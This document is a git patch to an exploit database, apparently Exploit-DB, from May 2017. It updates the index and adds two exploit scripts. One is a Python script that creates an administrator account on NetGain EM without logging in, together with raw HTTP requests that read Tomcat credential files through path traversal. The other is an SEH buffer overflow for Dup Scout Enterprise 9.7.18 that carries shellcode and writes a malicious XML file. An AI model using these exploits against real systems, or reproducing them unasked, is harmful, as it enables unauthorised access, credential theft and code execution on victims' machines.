From 07c41df34df322f7c18c7152e91a5bdd2f091eaa Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 25 May 2017 05:01:17 +0000 Subject: [PATCH] DB: 2017-05-25 2 new exploits Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE (PoC) (MS12-034) Microsoft Windows XP - Keyboard Layouts Pool Corruption (PoC) (MS12-034) Microsoft Internet Explorer 6 - HtmlDlgSafeHelper Remote Denial of Service Microsoft Internet Explorer 6 - 'HtmlDlgSafeHelper' Remote Denial of Service Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion --- files.csv | 6 +- platforms/jsp/webapps/42058.py | 122 +++++++++++++++++++++++++++++++ platforms/windows/local/42059.py | 60 +++++++++++++++ 3 files changed, 186 insertions(+), 2 deletions(-) create mode 100755 platforms/jsp/webapps/42058.py create mode 100755 platforms/windows/local/42059.py diff --git a/files.csv b/files.csv index c8069e77b..0959e9ddc 100644 --- a/files.csv +++ b/files.csv @@ -2200,7 +2200,7 @@ id,file,description,date,author,platform,type,port 18878,platforms/windows/dos/18878.txt,"Pro-face Pro-Server EX WinGP PC Runtime - Multiple Vulnerabilities",2012-05-14,"Luigi Auriemma",windows,dos,0 18890,platforms/multiple/dos/18890.txt,"Java - Trigerring Java Code from a .SVG Image",2012-05-16,"Nicolas Gregoire",multiple,dos,0 18909,platforms/php/dos/18909.php,"PHP 5.4.3 - wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Dereference",2012-05-21,condis,php,dos,0 -18894,platforms/windows/dos/18894.txt,"Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE (PoC) (MS12-034)",2012-05-18,Cr4sh,windows,dos,0 +18894,platforms/windows/dos/18894.txt,"Microsoft Windows XP - Keyboard Layouts Pool Corruption (PoC) (MS12-034)",2012-05-18,Cr4sh,windows,dos,0 18902,platforms/windows/dos/18902.rb,"Real-DRAW PRO 5.2.4 - Import File Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 18903,platforms/windows/dos/18903.rb,"DVD-Lab Studio 1.25 - '.DAL' File Open Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 18910,platforms/php/dos/18910.php,"PHP 5.4.3 - (com_event_sink) Denial of Service",2012-05-21,condis,php,dos,0 @@ -3586,7 +3586,7 @@ id,file,description,date,author,platform,type,port 28194,platforms/windows/dos/28194.txt,"Microsoft Internet Explorer 6 - RDS.DataControl Denial of Service",2006-07-08,hdm,windows,dos,0 28196,platforms/windows/dos/28196.txt,"Microsoft Internet Explorer 6 - DirectAnimation.DAUserData Denial of Service",2006-07-08,hdm,windows,dos,0 28197,platforms/windows/dos/28197.txt,"Microsoft Internet Explorer 6 - Object.Microsoft.DXTFilter Denial of Service",2006-07-09,hdm,windows,dos,0 -28202,platforms/windows/dos/28202.txt,"Microsoft Internet Explorer 6 - HtmlDlgSafeHelper Remote Denial of Service",2006-07-10,hdm,windows,dos,0 +28202,platforms/windows/dos/28202.txt,"Microsoft Internet Explorer 6 - 'HtmlDlgSafeHelper' Remote Denial of Service",2006-07-10,hdm,windows,dos,0 28207,platforms/windows/dos/28207.txt,"Microsoft Internet Explorer 6 - TriEditDocument Denial of Service",2006-07-11,hdm,windows,dos,0 28213,platforms/windows/dos/28213.txt,"Microsoft Internet Explorer 6 - RevealTrans Denial of Service",2006-07-12,hdm,windows,dos,0 28220,platforms/linux/dos/28220.txt,"KDE Konqueror 3.5.x - ReplaceChild Denial of Service",2006-07-14,hdm,linux,dos,0 @@ -9008,6 +9008,7 @@ id,file,description,date,author,platform,type,port 42020,platforms/windows/local/42020.cpp,"Microsoft Windows - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation",2017-05-17,"Google Security Research",windows,local,0 42045,platforms/linux/local/42045.c,"VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Config Host Root Privilege Escalation",2017-05-22,"Google Security Research",linux,local,0 42053,platforms/linux/local/42053.c,"KDE 4/5 - 'KAuth' Privilege Escalation",2017-05-18,Stealth,linux,local,0 +42059,platforms/windows/local/42059.py,"Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow",2017-05-24,ScrR1pTK1dd13,windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -37778,6 +37779,7 @@ id,file,description,date,author,platform,type,port 41697,platforms/linux/webapps/41697.rb,"SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit)",2015-02-11,Metasploit,linux,webapps,0 41698,platforms/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,linux,webapps,0 41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0 +42058,platforms/jsp/webapps/42058.py,"NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion",2017-05-24,f3ci,jsp,webapps,0 41899,platforms/multiple/webapps/41899.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0 41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0 41717,platforms/php/webapps/41717.txt,"Gr8 Gallery Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0 diff --git a/platforms/jsp/webapps/42058.py b/platforms/jsp/webapps/42058.py new file mode 100755 index 000000000..395cf114f --- /dev/null +++ b/platforms/jsp/webapps/42058.py @@ -0,0 +1,122 @@ +''' +# Exploit Title: Add User Account with Admin Privilege without Login & Local File Inclusion +# Date: 2017-05-21 +# Exploit Author: f3ci +# Vendor Homepage: http://www.netgain-systems.com +# Software Link: http://www.netgain-systems.com/free-edition-download/ +# Version: <= v7.2.647 build 941 +# Tested on: Windows 7 + +Add User Account with Admin Privilege without Login +---------------------------------------------- +We can create user and give admin privilege to user which we have made +without login. +Because this app does not check the session on this request + + +Local File Inclusion +---------------------------------------------- +Normal Request: + +POST /u/jsp/log/download_do.jsp HTTP/1.1 +Host: 192.168.0.21:8081 +User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.0.21:8081/u/index.jsp +Cookie: JSESSIONID=8A172EB8DDBD08D1E6D25A1CE8CC74AC +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 18 + +filename=iossd.log + +We can download another file with change value on filename parameter and +also we can send this request without login. + +Example: + +POST /u/jsp/log/download_do.jsp HTTP/1.1 +Host: 192.168.0.21:8081 +User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.0.21:8081/u/index.jsp +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 18 + +filename=../../tomcat/conf/tomcat-users.xml +''' +#!/usr/local/bin/python +# Exploit Title: Add User Account with Admin Privilege without Login +# Date: 2017-05-21 +# Exploit Author: f3ci +# Vendor Homepage: http://www.netgain-systems.com +# Software Link: http://www.netgain-systems.com/free-edition-download/ +# Version: <= v7.2.647 build 941 +# Tested on: Windows 7 + +import requests +import sys + +try: + def create(): + ip = str(sys.argv[1]) + port = str(sys.argv[2]) + user = str(sys.argv[3]) + passwd = str(sys.argv[4]) + + print "\033[1;32m[+]\033[1;m Try to Create user" + url="http://"+ip+":"+port+"/u/jsp/security/user_save_do.jsp" + data= { + 'new': "true", + 'id': "", + 'name': user, + 'dname': "foobar", + 'password': passwd, + 'password2': passwd, + 'description': "", + 'emails': "foo@bar.com", + 'mobileNumber': "000000", + 'loginAttempts': "5", + } + response = requests.post(url, data=data) + status = response.status_code + if status == 200: + print "\033[1;32m[+]\033[1;m Success!!" + role() + else: + print "\033[91m[-]\033[91;m Create User Failed" + + + def role(): + ip = str(sys.argv[1]) + port = str(sys.argv[2]) + user = str(sys.argv[3]) + passwd = str(sys.argv[4]) + + print "\033[1;32m[+]\033[1;m Get admin role" + url="http://"+ip+":"+port+"/u/jsp/security/role_save_do.jsp" + data= { + 'name': "admin", + 'description': "Administrator", + 'users': [user,"admin"], + } + response = requests.post(url, data=data) + status = response.status_code + if status == 200: + print "\033[1;32m[+]\033[1;m Success!!" + print "\033[1;32m[+]\033[1;m Login with user:" +user+ " password:" + passwd + else: + print "\033[91m[-]\033[91;m Get admin role Failed" + + create(); + +except: + print "\033[91m[!]\033[91;m Usage: %s " % str(sys.argv[0]) + print "\033[91m[!]\033[91;m Ex: %s 127.0.0.1 8081 foobar passw0rd" % str(sys.argv[0]) diff --git a/platforms/windows/local/42059.py b/platforms/windows/local/42059.py new file mode 100755 index 000000000..ce27b42c1 --- /dev/null +++ b/platforms/windows/local/42059.py @@ -0,0 +1,60 @@ +author = ''' + + ############################################## + # Created: ScrR1pTK1dd13 # + # Name: Greg Priest # + # Mail: ScR1pTK1dd13.slammer@gmail.com # + ############################################## + +# Exploit Title: Dup Scout Enterprise v9.7.18 Import Local Buffer Overflow Vuln.(SEH) +# Date: 2017.05.24 +# Exploit Author: Greg Priest +# Version: Dup Scout Enterprise v9.7.18 +# Tested on: Windows7 x64 HUN/ENG Professional +''' + + +import os +import struct + +overflow = "A" * 1536 +jmp_esp = "\x94\x21\x1C\x65" +#651F20E5 +#651F214E +#652041ED +nop = "\x90" * 16 +esp = "\x8D\x44\x24\x4A" +jmp = "\xFF\xE0" +nop2 = "\x90" * 70 +nSEH = "\x90\x90\xEB\x05" +SEH = "\x80\x5F\x1C\x90" +#"\x80\x5F\x1C\x65" +#6508F78D +#650E129F +#651C5F80 +shellcode =( +"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" + +"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" + +"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" + +"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" + +"\x57\x78\x01\xc2\x8b\x7a\x20\x01" + +"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" + +"\x45\x81\x3e\x43\x72\x65\x61\x75" + +"\xf2\x81\x7e\x08\x6f\x63\x65\x73" + +"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" + +"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" + +"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" + +"\xb1\xff\x53\xe2\xfd\x68\x63\x61" + +"\x6c\x63\x89\xe2\x52\x52\x53\x53" + +"\x53\x53\x53\x53\x52\x53\xff\xd7") + +crash = overflow+jmp_esp+nop+esp+jmp+nop2+nSEH+SEH+"\x90" * 10+shellcode + +evil = '\n' +exploit = open('Ev1l.xml', 'w') +exploit.write(evil) +exploit.close() + +print "Ev1l.xml raedy!" + +